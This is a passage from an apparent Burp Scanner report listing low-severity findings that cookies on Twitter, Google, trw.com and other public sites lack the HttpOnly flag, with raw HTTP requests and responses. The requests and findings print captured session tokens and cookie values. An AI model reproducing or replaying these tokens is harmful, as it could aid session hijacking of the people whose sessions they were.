ASPSESSIONIDQSDTDCQS=GFEFFOICKJDDPBENNAKBIDFF; path=/
visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.45. http://sorry.google.com/sorry/Captcha previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sorry.google.com
Path:	/sorry/Captcha

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ; path=/; domain=google.com; expires=Wed, 02-Feb-2011 19:28:06 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.46. http://spoofem.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://spoofem.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=q67pjjpm52p00755fccsgago42; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: spoofem.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=q67pjjpm52p00755fccsgago42; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://spoofem.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

<head>

...[SNIP]...

12.47. http://trw.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trw.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS6ce6c8782f0180a7bbf1be6e3bdd5794=irfb6j6tguh6qri8bi1dehb9l5; expires=Fri, 25 Feb 2011 22:48:54 GMT; path=/; domain=.trw.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: trw.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:15:34 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS6ce6c8782f0180a7bbf1be6e3bdd5794=irfb6j6tguh6qri8bi1dehb9l5; expires=Fri, 25 Feb 2011 22:48:54 GMT; path=/; domain=.trw.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 19:15:34 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 10681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

12.48. http://trw.mediaroom.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://trw.mediaroom.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=96h5pb857mgr9cp1ldob99elb1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php HTTP/1.1
Host: trw.mediaroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.49. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129452629042599503; k=173.193.214.243.1296227675375304; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296314194.1296521894.4; __utmc=43838368; __utmv=43838368.lang%3A%20en; original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; _twitter_sess=BAh7CToVaW5fbmV3X3VzZXJfZmxvdzA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4%250ANTU1ODc1MGJjZTQ2Y2E4OSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCPJP%250Aud4tAQ%253D%253D--68405592e8acf69fc0a9e659d46c67302e2aaff9

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:19:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663586-63376-31849
ETag: "9619709b8936a6ff27f3b0b707b18bc2"-gzip
Last-Modified: Wed, 02 Feb 2011 16:19:46 GMT
X-Runtime: 0.01641
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 44230

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

12.50. http://twitter.com/BWBLLC previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/BWBLLC

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWRkMWJkNjNjOGU3MzQ2NWE5NTFhYjYzODhhMGE2NzNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIeNuj4S0B--c9572565bc313082d5b9e07f8d706ef935c47b43; domain=.twitter.com; path=/
k=173.193.214.243.1296570765223791; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
guest_id=129657076824620235; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BWBLLC HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.51. http://twitter.com/BW_Technology previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/BW_Technology

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTljYTdkYWIzMjIzZjYxMWJkNGYzYjJlNDQzYmNlMDc3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI296j4S0B--42513326a672403856d8e72f3be1e034918ba41e; domain=.twitter.com; path=/
k=173.193.214.243.1296570767091469; path=/; expires=Tue, 08-Feb-11 14:32:47 GMT; domain=.twitter.com
guest_id=129657076911317049; path=/; expires=Thu, 03 Mar 2011 14:32:49 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BW_Technology HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.52. http://twitter.com/Chester_Pitts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Chester_Pitts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Chester_Pitts HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.53. http://twitter.com/Cirque previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Cirque

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Cirque HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.54. http://twitter.com/JetBlue previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/JetBlue

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JetBlue HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.55. http://twitter.com/JohnsHopkinsSPH previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/JohnsHopkinsSPH

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /JohnsHopkinsSPH HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.56. http://twitter.com/McKQuarterly previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/McKQuarterly

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /McKQuarterly HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.57. http://twitter.com/MomsWhoSave previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/MomsWhoSave

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /MomsWhoSave HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.58. http://twitter.com/NetworkConnects previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/NetworkConnects

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJWEyN2JjYTllZTU4ZmQ5OWFkNzQ2MDFjNzgyMGI4Njk1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIQlKk4S0B--c2869b37ba3e800b99d06240d4d63125f6c1aac4; domain=.twitter.com; path=/
k=173.193.214.243.1296570798650092; path=/; expires=Tue, 08-Feb-11 14:33:18 GMT; domain=.twitter.com
guest_id=129657079865736372; path=/; expires=Thu, 03 Mar 2011 14:33:18 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NetworkConnects HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.59. http://twitter.com/Nightline previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Nightline

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Nightline HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.60. http://twitter.com/NoReservations previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/NoReservations

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NoReservations HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

12.61. http://twitter.com/NylonMag previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/NylonMag

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /NylonMag HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
